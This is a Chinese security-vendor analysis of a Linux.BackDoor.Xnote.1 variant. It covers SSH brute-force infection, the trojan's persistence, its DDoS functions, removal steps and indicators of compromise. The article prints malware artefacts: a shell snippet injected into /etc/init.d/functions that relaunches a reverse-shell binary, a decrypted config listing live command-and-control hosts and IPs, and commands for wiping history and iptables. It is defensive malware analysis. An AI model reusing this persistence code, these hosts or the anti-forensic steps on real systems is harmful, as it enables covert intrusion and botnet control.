频道栏目
首页 > 安全 > 网络安全 > 正文

【前方高危】Linux.BackDoor.Xnote.1最新变种来袭

2018-06-07 14:50:06      个评论      
收藏   我要投稿

一、事件背景

【前方高危】Linux.BackDoor.Xnote.1最新变种来袭。根据某客户现场反应,部署在网络环境中的深信服安全感知系统报警,某Linux服务器经常出现apache的conf文件被篡改后出现挂黑链的情况,并且偶尔出现大规模的DDOS外发现象恶意进程删除后会自动重启,无法彻底删除。

深信服EDR安全团队快速定位,捕获到了相应的病毒样本,通过分析确认此样本是Linux.BackDoor.Xnote.1恶意样本的最新变种,感染方式与之前类似。

此样本在VT(www.virustotal.com)上的截图信息,如下所示:

\

目前只有少数几家安全厂商能识别出此恶意样本。

二、样本流程图

病毒主体进程守护,如图:

\

说明:病毒先将自身启动代码写入系统启动读取的配置文件中,系统每一次启动都会先读取配置文件后加载病毒文件dump_tcp,再由它来释放出另一个病毒文件到tmp目录下。病毒文件dump_tcp在系统中会创建三个相同的进程[ksoftirqd/7],并互为守护进程。

病毒母体运行流程,如图:

\

三、样本简介

Linux.BackDoor.Xnote.1最早是由国外安全公司Dr.Web发现,该木马功能完善,主要通过爆力破解服务器SSH,感染服务器主机,然后利用服务器主机对相应的IP地址发起DDOS攻击。

Linux.BackDoor.Xnote.1是一款多功能木马后门程序,目的是在受感染设备中执行入侵者发出的各种命令,例如进行DDoS攻击、组建僵尸网络等各种各样的恶意行为。后门进程运行过程中会收集系统的相关信息,并将这些信息发送到C&C(命令控制)服务器后等待下一步指示。入侵者则可以通过远程命令对主机下发对指定目标发动SYN Flood、UDP Flood、CC攻击和NTP 放大攻击等任务,或者通过后门程序实现对感染设备的完全控制,在感染设备中进行上传/下载入侵者指定的文件,对感染设备的文件系统进行管理等行为(包括窃取并发送用户数据,创建、删除以及运行文件等,危险等级极高)。

初步推断这是国内黑客生成的Linux后门集群木马(Dr.Web则认为,来自中国的ChinaZ黑客组织是幕后黑手),用于控制被感染主机,获取被感染主机资料信息,组建僵尸网络发动DDoS攻击。

四、样本分析跟踪过程

通过线程检查发现,系统存在二个对外发起连接的进程

\

外联地址均为HK的IP地址,黑客朋友都懂得,毕竟方便且价格便宜。

\

根据对二个对外发起连接的恶意进程进行追溯,发现其中一个进程的父进程PID信息,通过检查发现伪装的电源进程kthreadd且三个相为守护进程。同时删除三个进程之后一段时间后依然会重新运行。

\

对伪装threadd进程进行进一步分析,发现其中的存在可疑的模块。

\
\

通过对源码与内存中的信息进行分析,发现病毒程序启动时会释放相关文件到/var/tmp/目录下,运行完之后自动删除。

备份的病毒母体dump_tcp文件到/usr/sbin/目录之下,释放另外一个通信进程cupsd到/user/local目录下。

同时生成一个名为nfsiod的反弹shell,反编译之后如下:

\
\

连接的域名为: zzz.457467.com 威胁情报暂未收录此域名。

\

病毒通过遍历/etc/init.d/ 与 /etc/rc.d/init.d/中的文件,查找字符串”!#/bin/sh”开头的文件并在文件结尾添加自启动代码,保证了即使三个进程被同时删除后在一定的时间内也可以重新启动。

感染etc/init.d/functions,在最后添加代码运行在/usr/lib/目录下的nfsiod此hell为

PRISM-ICMP-Reverse-Shell类,详细介绍可百度一下。

PIDS=`ps -ef |grep '\[nfsiod\]' |grep -v grep | awk '{print $2}'`

if [ "$PIDS" != "" ]; then

kill -9 $PIDS

/usr/lib/nfsiod 1>/dev/null 2>/dev/null

else

/usr/lib/nfsiod 1>/dev/null 2>/dev/null

fi

\

发现大部分启动项文件都已经被篡改,如下:

\

五、样本主体分析

(1)样本通过Linux upx变形壳进行加密,无法使用upx工具直接脱壳,如下:

\

动态调试,手工脱壳,找到母体代码入口,如下:

\

然后dump出样本的母体文件,通过ida进行分析。

(2)通过sys_stat64函数判断是否存在/tmp文件目录,如果存在则安装恶意程序,如下:

\

(3)读取进程,获取文件的绝对路径,open(/proc/self/exe)如下:

\

(4)解密出恶意文件配置相关信息,如下:

\

解密出来的信息如下:

[main]

auto_start = 1

close_iptable = 0

cmd0 = "fuser -k /tmp/.wq4sMLArXw"

fake_ps = [kthreadd]

group = xin

host0 = 112.175.69.81:80

host1 = yy.goodyouxi.com:80

host2 = 123.1.152.18:443

host3 = bak.goodyouxi.com:445

install_path = /usr/sbin/dump_tcp

install_path_bak = /usr/local/share/man/man1/mail.conf

is_worker = 0

killprocess0 = /bin/iptable6

killprocess1 = rkthunter

lock_fd = -1

lock_file = /bin/sh

mon_interval = 10

note = xdkb

plugin_dir = /usr/lib/plgs/

retry_interval = 5

tmp_start_dir = /var/tmp

从上面的配置文件,我们可以基本上看出这款恶意程序的感染方式,远程服务器地址列表等。

(5)后面就是进行一系列的安装,驻留等过程,如下:

\

(6)清除入侵的日志信息,如下:

\

能过设置HISTFILE=/dev/null HISTSIZE=0 HISTFILESIZE=0,如下:

\

(7)清除入侵主机的iptables规则,如下:

\

通过调用iptable -F进行清除,如下:

\

(8)遍历etc/init.d与/etc/rc.d/init.d中的文件,然后查找相应的字符串”!#/bin/sh”开头的文件并在文件结尾添加自启动代码,如下:

\

感染完成之后,如下图所示:

\

(9)收集主机相关的信息,如下:

\

收集的主要信息,如下:

/proc/meminfo /proc/cpuinfo /etc/hostname /proc/net/udp等

(10)恶意程序感染安装完成之后,会通过远程命令执行不同的操作,如下:

\

(11)通过循环接受远程命令对指定目标可以开启不同类型的DDoS攻击(SYN DDoS、UDP DDoS、NTP DDoS,CC DDoS),当收到DDoS攻击指令后会单独开一个新的线程进行攻击,以SYN DDoS攻击为例:

\
\

(11)恶意样本运行完成之后,能过unlink进行自删除操作。

六、清除病毒

1.同时结束三个伪装的电源进程kthreadd与伪装cupsd进程

2.结束发包进程Vmtoolsd、sh(若存在)

3.删除/usr/lib/nfsiod 反弹shell连接

4.删除/var/tmp/下的所有病毒释放体文件

5.Vi /etc/init.d/functions文件删除最下面的如下片断

PIDS=`ps -ef |grep '\[nfsiod\]' |grep -v grep | awk '{print $2}'`

if [ "$PIDS" != "" ]; then

kill -9 $PIDS

/usr/lib/nfsiod 1>/dev/null 2>/dev/null

else

/usr/lib/nfsiod 1>/dev/null 2>/dev/null

Fi

6.删除病毒母体文件目录为:usr/sbin/dump_tcp 、/etc/security/ntps.conf

7.清理被篡的启动项文件,包括/etc/init.d/与/etc/rc.d/下的所有文件,删除文件前几行中的如下字段:

/usr/sbin/dump_tcp 2 > /dev/null

/usr/security/ntps.conf 2 > /dev/null

七、解决方案

1.病毒在此次安全事件中是通过SSH弱口令爆破,由此提醒用户要注意定期修改系统中各类重要密码,并建议使用比较复杂的口令作为密码。

八、IOC

MD5

054CC420656E2BD296868F9F65DFF57B

112.175.69.81:80

yy.goodyouxi.com:80

123.1.152.18:443

bak.goodyouxi.com:445

上一篇:谷歌应用现怪异Bug:搜索特定词条会暴露短信
下一篇:挖矿木马借“XX的秘密”等小黄书疯传,中毒后会劫持比特币交易
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站